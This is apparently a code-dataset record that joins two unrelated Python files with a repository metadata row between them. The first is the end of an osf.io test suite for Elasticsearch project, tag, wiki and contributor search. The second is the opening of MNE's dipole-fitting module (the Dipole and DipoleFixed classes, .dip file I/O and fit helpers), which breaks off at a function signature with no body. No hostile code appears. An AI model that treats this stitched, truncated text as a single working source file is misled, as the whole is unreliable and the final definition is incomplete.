        # component still appears but doesn't link to the parent in search.
        self.project.set_privacy('private')
        docs = query('category:component AND ' + self.title)['results']
        assert_equal(len(docs), 1)
        assert_equal(docs[0]['parent_title'], '-- private project --')
        assert_false(docs[0]['parent_url'])

    def test_delete_project(self):
        # Removing nodes should remove their documents from the index.
        self.component.remove_node(self.consolidate_auth)
        docs = query('category:component AND ' + self.title)['results']
        assert_equal(len(docs), 0)
        self.project.remove_node(self.consolidate_auth)
        docs = query('category:project AND ' + self.title)['results']
        assert_equal(len(docs), 0)

    def test_change_title(self):
        # Only the current title should be searchable after a rename.
        title_original = self.project.title
        self.project.set_title(
            'Blue Ordinary', self.consolidate_auth, save=True)
        docs = query('category:project AND ' + title_original)['results']
        assert_equal(len(docs), 0)
        docs = query('category:project AND ' + self.project.title)['results']
        assert_equal(len(docs), 1)

    def test_add_tags(self):
        # Tags become searchable exactly when they are added.
        tags = ['stonecoldcrazy', 'just a poor boy', 'from-a-poor-family']
        for tag in tags:
            docs = query('tags:"{}"'.format(tag))['results']
            assert_equal(len(docs), 0)
            self.project.add_tag(tag, self.consolidate_auth, save=True)
        for tag in tags:
            docs = query('tags:"{}"'.format(tag))['results']
            assert_equal(len(docs), 1)

    def test_remove_tag(self):
        # Removing a tag immediately removes it from the index.
        tags = ['stonecoldcrazy', 'just a poor boy', 'from-a-poor-family']
        for tag in tags:
            self.project.add_tag(tag, self.consolidate_auth, save=True)
            self.project.remove_tag(tag, self.consolidate_auth, save=True)
            docs = query('tags:"{}"'.format(tag))['results']
            assert_equal(len(docs), 0)

    def test_update_wiki(self):
        """Add text to a wiki page, then verify that project is found when
        searching for wiki text.
        """
        wiki_content = {
            'home': 'Hammer to fall',
            'swag': '#YOLO'
        }
        for key, value in wiki_content.items():
            docs = query(value)['results']
            assert_equal(len(docs), 0)
            self.project.update_node_wiki(
                key, value, self.consolidate_auth,
            )
            docs = query(value)['results']
            assert_equal(len(docs), 1)

    def test_clear_wiki(self):
        # Add wiki text to page, then delete, then verify that project is not
        # found when searching for wiki text.
        wiki_content = 'Hammer to fall'
        self.project.update_node_wiki(
            'home', wiki_content, self.consolidate_auth,
        )
        self.project.update_node_wiki('home', '', self.consolidate_auth)
        docs = query(wiki_content)['results']
        assert_equal(len(docs), 0)

    def test_add_contributor(self):
        # Add a contributor, then verify that project is found when searching
        # for contributor.
        user2 = UserFactory(fullname='Adam Lambert')
        docs = query('category:project AND "{}"'.format(user2.fullname))['results']
        assert_equal(len(docs), 0)
        self.project.add_contributor(user2, save=True)
        docs = query('category:project AND "{}"'.format(user2.fullname))['results']
        assert_equal(len(docs), 1)

    def test_remove_contributor(self):
        # Add and remove a contributor, then verify that project is not found
        # when searching for contributor.
        user2 = UserFactory(fullname='Brian May')
        self.project.add_contributor(user2, save=True)
        self.project.remove_contributor(user2, self.consolidate_auth)
        docs = query('category:project AND "{}"'.format(user2.fullname))['results']
        assert_equal(len(docs), 0)

    def test_hide_contributor(self):
        # Hidden contributors must not be searchable; visible ones must be.
        user2 = UserFactory(fullname='Brian May')
        self.project.add_contributor(user2)
        self.project.set_visible(user2, False, save=True)
        docs = query('category:project AND "{}"'.format(user2.fullname))['results']
        assert_equal(len(docs), 0)
        self.project.set_visible(user2, True, save=True)
        docs = query('category:project AND "{}"'.format(user2.fullname))['results']
        assert_equal(len(docs), 1)

    def test_wrong_order_search(self):
        # Word order in the query should not matter; all three public nodes
        # share the same title words.
        title_parts = self.title.split(' ')
        title_parts.reverse()
        title_search = ' '.join(title_parts)
        docs = query(title_search)['results']
        assert_equal(len(docs), 3)

    def test_tag_aggregation(self):
        # Tag aggregations on the result set should surface all added tags.
        tags = ['stonecoldcrazy', 'just a poor boy', 'from-a-poor-family']
        for tag in tags:
            self.project.add_tag(tag, self.consolidate_auth, save=True)
        docs = query(self.title)['tags']
        assert len(docs) == 3
        for doc in docs:
            assert doc['key'] in tags
@requires_search
class TestAddContributor(SearchTestCase):
    # Tests of the search.search_contributor method
    """Behaviour of contributor search for full, partial and accented names."""

    def setUp(self):
        super(TestAddContributor, self).setUp()
        # name1/name3 belong to registered users; name2/name4 to nobody.
        self.name1 = 'Roger1 Taylor1'
        self.name2 = 'John2 Deacon2'
        self.name3 = u'j\xc3\xb3ebert3 Smith3'
        self.name4 = u'B\xc3\xb3bbert4 Jones4'
        self.user = UserFactory(fullname=self.name1)
        self.user3 = UserFactory(fullname=self.name3)

    def test_unreg_users_dont_show_in_search(self):
        # Unregistered users should never appear in contributor search.
        unreg = UnregUserFactory()
        contribs = search.search_contributor(unreg.fullname)
        assert_equal(len(contribs['users']), 0)

    def test_unreg_users_do_show_on_projects(self):
        # ...but their public projects are still findable under their name.
        unreg = UnregUserFactory(fullname='Robert Paulson')
        self.project = ProjectFactory(
            title='Glamour Rock',
            creator=unreg,
            is_public=True,
        )
        results = query(unreg.fullname)['results']
        assert_equal(len(results), 1)

    def test_search_fullname(self):
        # Searching for full name yields exactly one result.
        contribs = search.search_contributor(self.name1)
        assert_equal(len(contribs['users']), 1)
        contribs = search.search_contributor(self.name2)
        assert_equal(len(contribs['users']), 0)

    def test_search_firstname(self):
        # Searching for first name yields exactly one result.
        contribs = search.search_contributor(self.name1.split(' ')[0])
        assert_equal(len(contribs['users']), 1)
        contribs = search.search_contributor(self.name2.split(' ')[0])
        assert_equal(len(contribs['users']), 0)

    def test_search_partial(self):
        # Searching for part of first name yields exactly one
        # result.
        contribs = search.search_contributor(self.name1.split(' ')[0][:-1])
        assert_equal(len(contribs['users']), 1)
        contribs = search.search_contributor(self.name2.split(' ')[0][:-1])
        assert_equal(len(contribs['users']), 0)

    def test_search_fullname_special_character(self):
        # Searching for a fullname with a special character yields
        # exactly one result.
        contribs = search.search_contributor(self.name3)
        assert_equal(len(contribs['users']), 1)
        contribs = search.search_contributor(self.name4)
        assert_equal(len(contribs['users']), 0)

    def test_search_firstname_special_charcter(self):
        # Searching for a first name with a special character yields
        # exactly one result.
        contribs = search.search_contributor(self.name3.split(' ')[0])
        assert_equal(len(contribs['users']), 1)
        contribs = search.search_contributor(self.name4.split(' ')[0])
        assert_equal(len(contribs['users']), 0)

    def test_search_partial_special_character(self):
        # Searching for a partial name with a special character yields
        # exctly one result.
        contribs = search.search_contributor(self.name3.split(' ')[0][:-1])
        assert_equal(len(contribs['users']), 1)
        contribs = search.search_contributor(self.name4.split(' ')[0][:-1])
        assert_equal(len(contribs['users']), 0)
@requires_search
class TestProjectSearchResults(SearchTestCase):
    """Stemming: singular, plural and possessive title forms should all
    match each other, while an unrelated title never matches."""

    def setUp(self):
        super(TestProjectSearchResults, self).setUp()
        # NOTE(review): 'usename' looks like a typo for 'username'; the
        # factory most likely ignores it — confirm before relying on it.
        self.user = UserFactory(usename='Doug Bogie')
        self.singular = 'Spanish Inquisition'
        self.plural = 'Spanish Inquisitions'
        self.possessive = 'Spanish\'s Inquisition'
        self.project_singular = ProjectFactory(
            title=self.singular,
            creator=self.user,
            is_public=True,
        )
        self.project_plural = ProjectFactory(
            title=self.plural,
            creator=self.user,
            is_public=True,
        )
        self.project_possessive = ProjectFactory(
            title=self.possessive,
            creator=self.user,
            is_public=True,
        )
        # Control project that should never match the queries below.
        self.project_unrelated = ProjectFactory(
            title='Cardinal Richelieu',
            creator=self.user,
            is_public=True,
        )

    def test_singular_query(self):
        # Verify searching for singular term includes singular,
        # possessive and plural versions in results.
        results = query(self.singular)['results']
        assert_equal(len(results), 3)

    def test_plural_query(self):
        # Verify searching for singular term includes singular,
        # possessive and plural versions in results.
        results = query(self.plural)['results']
        assert_equal(len(results), 3)

    def test_possessive_query(self):
        # Verify searching for possessive term includes singular,
        # possessive and plural versions in results.
        results = query(self.possessive)['results']
        assert_equal(len(results), 3)
class TestSearchExceptions(OsfTestCase):
    # Verify that the correct exception is thrown when the connection is lost

    @classmethod
    def setUpClass(cls):
        logging.getLogger('website.project.model').setLevel(logging.CRITICAL)
        super(TestSearchExceptions, cls).setUpClass()
        # Simulate a lost connection by removing the elasticsearch client.
        if settings.SEARCH_ENGINE == 'elastic':
            cls._es = search.search_engine.es
            search.search_engine.es = None

    @classmethod
    def tearDownClass(cls):
        super(TestSearchExceptions, cls).tearDownClass()
        # Restore the real client so later test cases are unaffected.
        if settings.SEARCH_ENGINE == 'elastic':
            search.search_engine.es = cls._es

    def test_connection_error(self):
        # Ensures that saving projects/users doesn't break as a result of connection errors
        # NOTE(review): 'usename' looks like a typo for 'username' — confirm.
        self.user = UserFactory(usename='Doug Bogie')
        self.project = ProjectFactory(
            title="Tom Sawyer",
            creator=self.user,
            is_public=True,
        )
        self.user.save()
        self.project.save()
class TestSearchMigration(SearchTestCase):
    # Verify that the correct indices are created/deleted during migration
    # NOTE: Python 2 code (xrange, dict.keys() indexing).

    @classmethod
    def tearDownClass(cls):
        super(TestSearchMigration, cls).tearDownClass()
        # Recreate the canonical index removed during the migration tests.
        search.create_index(settings.ELASTIC_INDEX)

    def setUp(self):
        super(TestSearchMigration, self).setUp()
        self.es = search.search_engine.es
        search.delete_index(settings.ELASTIC_INDEX)
        search.create_index(settings.ELASTIC_INDEX)
        self.user = UserFactory(fullname='David Bowie')
        self.project = ProjectFactory(
            title=settings.ELASTIC_INDEX,
            creator=self.user,
            is_public=True
        )

    def test_first_migration_no_delete(self):
        migrate(delete=False, index=settings.ELASTIC_INDEX, app=self.app.app)
        var = self.es.indices.get_aliases()
        # The versioned index (_v1) must be aliased to the canonical name.
        assert_equal(var[settings.ELASTIC_INDEX + '_v1']['aliases'].keys()[0], settings.ELASTIC_INDEX)

    def test_multiple_migrations_no_delete(self):
        # Each successive migration bumps the version suffix and re-aliases.
        for n in xrange(1, 21):
            migrate(delete=False, index=settings.ELASTIC_INDEX, app=self.app.app)
            var = self.es.indices.get_aliases()
            assert_equal(var[settings.ELASTIC_INDEX + '_v{}'.format(n)]['aliases'].keys()[0], settings.ELASTIC_INDEX)

    def test_first_migration_with_delete(self):
        migrate(delete=True, index=settings.ELASTIC_INDEX, app=self.app.app)
        var = self.es.indices.get_aliases()
        assert_equal(var[settings.ELASTIC_INDEX + '_v1']['aliases'].keys()[0], settings.ELASTIC_INDEX)

    def test_multiple_migrations_with_delete(self):
        # With delete=True each migration should drop the previous versioned
        # index after re-aliasing.
        for n in xrange(1, 21, 2):
            migrate(delete=True, index=settings.ELASTIC_INDEX, app=self.app.app)
            var = self.es.indices.get_aliases()
            assert_equal(var[settings.ELASTIC_INDEX + '_v{}'.format(n)]['aliases'].keys()[0], settings.ELASTIC_INDEX)
            migrate(delete=True, index=settings.ELASTIC_INDEX, app=self.app.app)
            var = self.es.indices.get_aliases()
            assert_equal(var[settings.ELASTIC_INDEX + '_v{}'.format(n + 1)]['aliases'].keys()[0], settings.ELASTIC_INDEX)
            assert not var.get(settings.ELASTIC_INDEX + '_v{}'.format(n))
|
barbour-em/osf.io
|
tests/test_elastic.py
|
Python
|
apache-2.0
| 20,719
|
[
"Brian"
] |
e94c96612ee44e694f26bc0c922d43d538b866bda31ad1cec59940488bc4fdc4
|
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Eric Larson <larson.eric.d@gmail.com>
#
# License: Simplified BSD
from copy import deepcopy
import re
import numpy as np
from scipy import linalg
from .cov import read_cov, _get_whitener_data
from .io.constants import FIFF
from .io.pick import pick_types, channel_type
from .io.proj import make_projector, _needs_eeg_average_ref_proj
from .bem import _fit_sphere
from .evoked import _read_evoked, _aspect_rev, _write_evokeds
from .transforms import (_print_coord_trans, _coord_frame_name,
apply_trans, invert_transform, Transform)
from .viz.evoked import _plot_evoked
from .forward._make_forward import (_get_trans, _setup_bem,
_prep_meg_channels, _prep_eeg_channels)
from .forward._compute_forward import (_compute_forwards_meeg,
_prep_field_computation)
from .externals.six import string_types
from .surface import (transform_surface_to, _normalize_vectors,
_get_ico_surface, _compute_nearest)
from .bem import _bem_find_surface, _bem_explain_surface
from .source_space import (_make_volume_source_space, SourceSpaces,
_points_outside_surface)
from .parallel import parallel_func
from .fixes import partial
from .utils import logger, verbose, _time_mask, warn, _check_fname, check_fname
class Dipole(object):
    """Dipole class for sequential dipole fits
    .. note:: This class should usually not be instantiated directly,
              instead :func:`mne.read_dipole` should be used.
    Used to store positions, orientations, amplitudes, times, goodness of fit
    of dipoles, typically obtained with Neuromag/xfit, mne_dipole_fit
    or certain inverse solvers. Note that dipole position vectors are given in
    the head coordinate frame.
    Parameters
    ----------
    times : array, shape (n_dipoles,)
        The time instants at which each dipole was fitted (sec).
    pos : array, shape (n_dipoles, 3)
        The dipoles positions (m) in head coordinates.
    amplitude : array, shape (n_dipoles,)
        The amplitude of the dipoles (nAm).
    ori : array, shape (n_dipoles, 3)
        The dipole orientations (normalized to unit length).
    gof : array, shape (n_dipoles,)
        The goodness of fit.
    name : str | None
        Name of the dipole.
    See Also
    --------
    read_dipole
    DipoleFixed
    Notes
    -----
    This class is for sequential dipole fits, where the position
    changes as a function of time. For fixed dipole fits, where the
    position is fixed as a function of time, use :class:`mne.DipoleFixed`.
    """
    def __init__(self, times, pos, amplitude, ori, gof, name=None):
        # Coerce everything to ndarrays so boolean masking in crop() and
        # fancy indexing in __getitem__ work uniformly.
        self.times = np.array(times)
        self.pos = np.array(pos)
        self.amplitude = np.array(amplitude)
        self.ori = np.array(ori)
        self.gof = np.array(gof)
        self.name = name
    def __repr__(self):
        # Summarize the number of fits and the covered time range.
        s = "n_times : %s" % len(self.times)
        s += ", tmin : %s" % np.min(self.times)
        s += ", tmax : %s" % np.max(self.times)
        return "<Dipole | %s>" % s
    def save(self, fname):
        """Save dipole in a .dip file
        Parameters
        ----------
        fname : str
            The name of the .dip file.
        """
        # Columns written per dipole: begin/end time (ms), position (mm),
        # amplitude (nAm), moment components (nAm), goodness of fit (%).
        fmt = "  %7.1f %7.1f %8.2f %8.2f %8.2f %8.3f %8.3f %8.3f %8.3f %6.1f"
        # NB CoordinateSystem is hard-coded as Head here
        with open(fname, 'wb') as fid:
            fid.write('# CoordinateSystem "Head"\n'.encode('utf-8'))
            fid.write('#   begin     end   X (mm)   Y (mm)   Z (mm)'
                      '   Q(nAm)  Qx(nAm)  Qy(nAm)  Qz(nAm)    g/%\n'
                      .encode('utf-8'))
            # Convert stored SI units to the file's units: s -> ms, m -> mm,
            # Am -> nAm (amplitude stored in Am is scaled by 1e9 here).
            t = self.times[:, np.newaxis] * 1000.
            gof = self.gof[:, np.newaxis]
            amp = 1e9 * self.amplitude[:, np.newaxis]
            out = np.concatenate((t, t, self.pos / 1e-3, amp,
                                  self.ori * amp, gof), axis=-1)
            np.savetxt(fid, out, fmt=fmt)
            if self.name is not None:
                # Trailing name line; read back by read_dipole()
                fid.write(('## Name "%s dipoles" Style "Dipoles"'
                           % self.name).encode('utf-8'))
    def crop(self, tmin=None, tmax=None):
        """Crop data to a given time interval
        Parameters
        ----------
        tmin : float | None
            Start time of selection in seconds.
        tmax : float | None
            End time of selection in seconds.
        """
        # Estimate an effective sampling rate from the median time step;
        # presumably used by _time_mask for endpoint tolerance -- TODO confirm
        sfreq = None
        if len(self.times) > 1:
            sfreq = 1. / np.median(np.diff(self.times))
        mask = _time_mask(self.times, tmin, tmax, sfreq=sfreq)
        # Apply the same mask to every per-dipole attribute.
        for attr in ('times', 'pos', 'gof', 'amplitude', 'ori'):
            setattr(self, attr, getattr(self, attr)[mask])
    def copy(self):
        """Copy the Dipoles object
        Returns
        -------
        dip : instance of Dipole
            The copied dipole instance.
        """
        return deepcopy(self)
    @verbose
    def plot_locations(self, trans, subject, subjects_dir=None,
                       bgcolor=(1, 1, 1), opacity=0.3,
                       brain_color=(1, 1, 0), fig_name=None,
                       fig_size=(600, 600), mode='cone',
                       scale_factor=0.1e-1, colors=None, verbose=None):
        """Plot dipole locations as arrows
        Parameters
        ----------
        trans : dict
            The mri to head trans.
        subject : str
            The subject name corresponding to FreeSurfer environment
            variable SUBJECT.
        subjects_dir : None | str
            The path to the freesurfer subjects reconstructions.
            It corresponds to Freesurfer environment variable SUBJECTS_DIR.
            The default is None.
        bgcolor : tuple of length 3
            Background color in 3D.
        opacity : float in [0, 1]
            Opacity of brain mesh.
        brain_color : tuple of length 3
            Brain color.
        fig_name : tuple of length 2
            Mayavi figure name.
        fig_size : tuple of length 2
            Mayavi figure size.
        mode : str
            Should be ``'cone'`` or ``'sphere'`` to specify how the
            dipoles should be shown.
        scale_factor : float
            The scaling applied to amplitudes for the plot.
        colors: list of colors | None
            Color to plot with each dipole. If None defaults colors are used.
        verbose : bool, str, int, or None
            If not None, override default verbose level (see mne.verbose).
        Returns
        -------
        fig : instance of mlab.Figure
            The mayavi figure.
        """
        from .viz import plot_dipole_locations
        # Split into one single-time-point Dipole per fit so each time
        # instant is drawn as its own arrow.
        dipoles = []
        for t in self.times:
            dipoles.append(self.copy())
            dipoles[-1].crop(t, t)
        return plot_dipole_locations(
            dipoles, trans, subject, subjects_dir, bgcolor, opacity,
            brain_color, fig_name, fig_size, mode, scale_factor,
            colors)
    def plot_amplitudes(self, color='k', show=True):
        """Plot the dipole amplitudes as a function of time
        Parameters
        ----------
        color: matplotlib Color
            Color to use for the trace.
        show : bool
            Show figure if True.
        Returns
        -------
        fig : matplotlib.figure.Figure
            The figure object containing the plot.
        """
        from .viz import plot_dipole_amplitudes
        return plot_dipole_amplitudes([self], [color], show)
    def __getitem__(self, idx_slice):
        """Handle indexing"""
        if isinstance(idx_slice, int):  # make sure attributes stay 2d
            idx_slice = [idx_slice]
        # Copy so the new Dipole does not share memory with this one.
        selected_times = self.times[idx_slice].copy()
        selected_pos = self.pos[idx_slice, :].copy()
        selected_amplitude = self.amplitude[idx_slice].copy()
        selected_ori = self.ori[idx_slice, :].copy()
        selected_gof = self.gof[idx_slice].copy()
        selected_name = self.name
        new_dipole = Dipole(selected_times, selected_pos,
                            selected_amplitude, selected_ori,
                            selected_gof, selected_name)
        return new_dipole
    def __len__(self):
        """Handle len function"""
        return self.pos.shape[0]
def _read_dipole_fixed(fname):
    """Read a fixed-position dipole FIF file into a DipoleFixed."""
    logger.info('Reading %s ...' % fname)
    _check_fname(fname, overwrite=True, must_exist=True)
    # Fixed dipoles are stored in evoked format; unpack the fields and
    # hand them straight to the DipoleFixed constructor.
    contents = _read_evoked(fname)
    info, nave, aspect_kind, first, last, comment, times, data = contents
    return DipoleFixed(info, data, times, nave, aspect_kind, first, last,
                       comment)
class DipoleFixed(object):
    """Dipole class for fixed-position dipole fits
    .. note:: This class should usually not be instantiated directly,
              instead :func:`mne.read_dipole` should be used.
    Parameters
    ----------
    info : instance of Info
        The measurement info.
    data : array, shape (n_channels, n_times)
        The dipole data.
    times : array, shape (n_times,)
        The time points.
    nave : int
        Number of averages.
    aspect_kind : int
        The kind of data.
    first : int
        First sample.
    last : int
        Last sample.
    comment : str
        The dipole comment.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).
    See Also
    --------
    read_dipole
    Dipole
    Notes
    -----
    This class is for fixed-position dipole fits, where the position
    (and maybe orientation) is static over time. For sequential dipole fits,
    where the position can change a function of time, use :class:`mne.Dipole`.
    .. versionadded:: 0.12
    """
    @verbose
    def __init__(self, info, data, times, nave, aspect_kind, first, last,
                 comment, verbose=None):
        self.info = info
        self.nave = nave
        self._aspect_kind = aspect_kind
        # Map the numeric FIFF aspect constant to a readable name;
        # fall back to 'Unknown' for unrecognized aspects.
        self.kind = _aspect_rev.get(str(aspect_kind), 'Unknown')
        self.first = first
        self.last = last
        self.comment = comment
        self.times = times
        self.data = data
        self.verbose = verbose
    @property
    def ch_names(self):
        """Channel names taken from the measurement info."""
        return self.info['ch_names']
    @verbose
    def save(self, fname, verbose=None):
        """Save dipole in a .fif file
        Parameters
        ----------
        fname : str
            The name of the .fif file. Must end with ``'.fif'`` or
            ``'.fif.gz'`` to make it explicit that the file contains
            dipole information in FIF format.
        verbose : bool, str, int, or None
            If not None, override default verbose level (see mne.verbose).
        """
        check_fname(fname, 'DipoleFixed', ('-dip.fif', '-dip.fif.gz'),
                    ('.fif', '.fif.gz'))
        # Serialized via the evoked writer since the storage format matches.
        _write_evokeds(fname, self, check=False)
    def plot(self, show=True):
        """Plot dipole data
        Parameters
        ----------
        show : bool
            Call pyplot.show() at the end or not.
        Returns
        -------
        fig : instance of matplotlib.figure.Figure
            The figure containing the time courses.
        """
        return _plot_evoked(self, picks=None, exclude=(), unit=True, show=show,
                            ylim=None, xlim='tight', proj=False, hline=None,
                            units=None, scalings=None, titles=None, axes=None,
                            gfp=False, window_title=None, spatial_colors=False,
                            plot_type="butterfly", selectable=False)
# #############################################################################
# IO
@verbose
def read_dipole(fname, verbose=None):
    """Read .dip file from Neuromag/xfit or MNE
    Parameters
    ----------
    fname : str
        The name of the .dip or .fif file.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).
    Returns
    -------
    dipole : instance of Dipole or DipoleFixed
        The dipole.
    See Also
    --------
    mne.Dipole
    mne.DipoleFixed
    """
    _check_fname(fname, overwrite=True, must_exist=True)
    if fname.endswith('.fif') or fname.endswith('.fif.gz'):
        return _read_dipole_fixed(fname)
    # Text .dip files use either '%' or '#' as comment markers depending on
    # the program that wrote them; try '%' first and fall back to '#'.
    # Only ValueError (a parse failure) is expected here -- the previous
    # bare ``except`` also hid genuine I/O errors.
    try:
        data = np.loadtxt(fname, comments='%')
    except ValueError:
        data = np.loadtxt(fname, comments='#')
    # Recover an optional name from the trailing "## Name ..." comment line.
    name = None
    with open(fname, 'r') as fid:
        for line in fid.readlines():
            if line.startswith('##') or line.startswith('%%'):
                m = re.search('Name "(.*) dipoles"', line)
                if m:
                    name = m.group(1)
                    break
    if data.ndim == 1:
        # Single dipole: keep the array 2D so column slicing below works.
        data = data[None, :]
    logger.info("%d dipole(s) found" % len(data))
    # Convert file units back to SI: ms -> s, mm -> m, nAm -> Am.
    times = data[:, 0] / 1000.
    pos = 1e-3 * data[:, 2:5]  # put data in meters
    amplitude = data[:, 5]
    norm = amplitude.copy()
    amplitude /= 1e9
    norm[norm == 0] = 1  # avoid division by zero for zero-amplitude rows
    ori = data[:, 6:9] / norm[:, np.newaxis]
    gof = data[:, 9]
    return Dipole(times, pos, amplitude, ori, gof, name)
# #############################################################################
# Fitting
def _dipole_forwards(fwd_data, whitener, rr, n_jobs=1):
    """Compute the forward solution for candidate positions and whiten it."""
    fwds = _compute_forwards_meeg(rr, fwd_data, n_jobs, verbose=False)
    B_orig = np.concatenate(fwds, axis=1)
    # Apply projection and whiten (cov has projections already)
    B = np.dot(B_orig, whitener.T)
    # Column normalization doesn't affect the fitting, so it is skipped;
    # unit scales are returned to keep the caller-facing contract intact.
    scales = np.ones(3)
    return B, B_orig, scales
def _make_guesses(surf_or_rad, r0, grid, exclude, mindist, n_jobs):
    """Make a guess space inside a sphere or BEM surface."""
    if isinstance(surf_or_rad, dict):
        # Already a BEM surface -- use it directly.
        surf = surf_or_rad
        logger.info('Guess surface (%s) is in %s coordinates'
                    % (_bem_explain_surface(surf['id']),
                       _coord_frame_name(surf['coord_frame'])))
    else:
        # Sphere model: build a spherical surface from an ico tessellation.
        rad = surf_or_rad[0]
        logger.info('Making a spherical guess space with radius %7.1f mm...'
                    % (1000 * rad))
        surf = _get_ico_surface(3)
        _normalize_vectors(surf['rr'])
        surf['rr'] *= rad
        surf['rr'] += r0
    logger.info('Filtering (grid = %6.f mm)...' % (1000 * grid))
    src = _make_volume_source_space(surf, grid, exclude, 1000 * mindist,
                                    do_neighbors=False, n_jobs=n_jobs)
    # Strip the result down to the fields needed later on.
    keep = src['vertno']
    src = dict(rr=src['rr'][keep], nn=src['nn'][keep], nuse=src['nuse'],
               coord_frame=src['coord_frame'],
               vertno=np.arange(src['nuse']))
    return SourceSpaces([src])
def _fit_eval(rd, B, B2, fwd_svd=None, fwd_data=None, whitener=None):
    """Calculate the residual sum of squares (1 - goodness of fit)."""
    if fwd_svd is None:
        # No precomputed decomposition: build the forward and SVD it here.
        fwd = _dipole_forwards(fwd_data, whitener, rd[np.newaxis, :])[0]
        fwd_svd = linalg.svd(fwd, overwrite_a=True, full_matrices=False)
    uu, sing, vv = fwd_svd
    gof = _dipole_gof(uu, sing, vv, B, B2)[0]
    # mne-c uses fitness=B2-Bm2, but ours (1-gof) is just a normalized version
    return 1. - gof
def _dipole_gof(uu, sing, vv, B, B2):
"""Calculate the goodness of fit from the forward SVD"""
ncomp = 3 if sing[2] / sing[0] > 0.2 else 2
one = np.dot(vv[:ncomp], B)
Bm2 = np.sum(one * one)
gof = Bm2 / B2
return gof, one
def _fit_Q(fwd_data, whitener, proj_op, B, B2, B_orig, rd, ori=None):
    """Fit the dipole moment once the location is known."""
    if 'fwd' in fwd_data:
        # Should be a single precomputed "guess" (i.e., fixed position).
        assert rd is None
        fwd = fwd_data['fwd']
        fwd_orig = fwd_data['fwd_orig']
        scales = fwd_data['scales']
        fwd_svd = fwd_data['fwd_svd'][0]
        assert fwd.shape[0] == 3
        assert fwd_orig.shape[0] == 3
        assert scales.shape == (3,)
    else:
        fwd, fwd_orig, scales = _dipole_forwards(fwd_data, whitener,
                                                 rd[np.newaxis, :])
        fwd_svd = None
    if ori is None:
        # Free orientation: estimate the moment from the forward's SVD.
        if fwd_svd is None:
            fwd_svd = linalg.svd(fwd, full_matrices=False)
        uu, sing, vv = fwd_svd
        gof, one = _dipole_gof(uu, sing, vv, B, B2)
        ncomp = len(one)
        # Counteract the effect of column normalization
        Q = scales[0] * np.sum(uu.T[:ncomp] *
                               (one / sing[:ncomp])[:, np.newaxis], axis=0)
    else:
        # Fixed orientation: collapse the forward onto that orientation.
        fwd = np.dot(ori[np.newaxis], fwd)
        sing = np.linalg.norm(fwd)
        one = np.dot(fwd / sing, B)
        gof = (one * one)[0] / B2
        Q = ori * (scales[0] * np.sum(one / sing))
    B_residual = _compute_residual(proj_op, B_orig, fwd_orig, Q)
    return Q, gof, B_residual
def _compute_residual(proj_op, B_orig, fwd_orig, Q):
"""Compute the residual"""
# apply the projector to both elements
return np.dot(proj_op, B_orig) - np.dot(np.dot(Q, fwd_orig), proj_op.T)
def _fit_dipoles(fun, min_dist_to_inner_skull, data, times, guess_rrs,
                 guess_data, fwd_data, whitener, proj_op, ori, n_jobs):
    """Fit one dipole per time point of the whitened, projected data."""
    from scipy.optimize import fmin_cobyla
    parallel, p_fun, _ = parallel_func(fun, n_jobs)
    # Parallelize over time points.
    res = parallel(p_fun(min_dist_to_inner_skull, B, t, guess_rrs,
                         guess_data, fwd_data, whitener, proj_op,
                         fmin_cobyla, ori)
                   for B, t in zip(data.T, times))
    # Repackage the per-time-point 5-tuples into arrays.
    pos, amp, ori_out, gof, residual = [
        np.array([r[ii] for r in res]) for ii in range(5)]
    gof *= 100  # convert to percentage
    return pos, amp, ori_out, gof, residual.T
'''Simplex code in case we ever want/need it for testing
def _make_tetra_simplex():
"""Make the initial tetrahedron"""
#
# For this definition of a regular tetrahedron, see
#
# http://mathworld.wolfram.com/Tetrahedron.html
#
x = np.sqrt(3.0) / 3.0
r = np.sqrt(6.0) / 12.0
R = 3 * r
d = x / 2.0
simplex = 1e-2 * np.array([[x, 0.0, -r],
[-d, 0.5, -r],
[-d, -0.5, -r],
[0., 0., R]])
return simplex
def try_(p, y, psum, ndim, fun, ihi, neval, fac):
"""Helper to try a value"""
ptry = np.empty(ndim)
fac1 = (1.0 - fac) / ndim
fac2 = fac1 - fac
ptry = psum * fac1 - p[ihi] * fac2
ytry = fun(ptry)
neval += 1
if ytry < y[ihi]:
y[ihi] = ytry
psum[:] += ptry - p[ihi]
p[ihi] = ptry
return ytry, neval
def _simplex_minimize(p, ftol, stol, fun, max_eval=1000):
"""Minimization with the simplex algorithm
Modified from Numerical recipes"""
y = np.array([fun(s) for s in p])
ndim = p.shape[1]
assert p.shape[0] == ndim + 1
mpts = ndim + 1
neval = 0
psum = p.sum(axis=0)
loop = 1
while(True):
ilo = 1
if y[1] > y[2]:
ihi = 1
inhi = 2
else:
ihi = 2
inhi = 1
for i in range(mpts):
if y[i] < y[ilo]:
ilo = i
if y[i] > y[ihi]:
inhi = ihi
ihi = i
elif y[i] > y[inhi]:
if i != ihi:
inhi = i
rtol = 2 * np.abs(y[ihi] - y[ilo]) / (np.abs(y[ihi]) + np.abs(y[ilo]))
if rtol < ftol:
break
if neval >= max_eval:
raise RuntimeError('Maximum number of evaluations exceeded.')
if stol > 0: # Has the simplex collapsed?
dsum = np.sqrt(np.sum((p[ilo] - p[ihi]) ** 2))
if loop > 5 and dsum < stol:
break
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, -1.)
if ytry <= y[ilo]:
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, 2.)
elif ytry >= y[inhi]:
ysave = y[ihi]
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, 0.5)
if ytry >= ysave:
for i in range(mpts):
if i != ilo:
psum[:] = 0.5 * (p[i] + p[ilo])
p[i] = psum
y[i] = fun(psum)
neval += ndim
psum = p.sum(axis=0)
loop += 1
'''
def _surface_constraint(rd, surf, min_dist_to_inner_skull):
    """Surface fitting constraint (positive when acceptably inside)."""
    point = rd[np.newaxis, :]
    dist = _compute_nearest(surf['rr'], point, return_dists=True)[1][0]
    # Distance is made negative when the candidate lies outside the surface.
    if _points_outside_surface(point, surf, 1)[0]:
        dist = -dist
    # Require at least min_dist_to_inner_skull of clearance below the
    # inner skull by shifting the constraint accordingly.
    return dist - min_dist_to_inner_skull
def _sphere_constraint(rd, r0, R_adj):
"""Sphere fitting constraint"""
return R_adj - np.sqrt(np.sum((rd - r0) ** 2))
def _fit_dipole(min_dist_to_inner_skull, B_orig, t, guess_rrs,
                guess_data, fwd_data, whitener, proj_op,
                fmin_cobyla, ori):
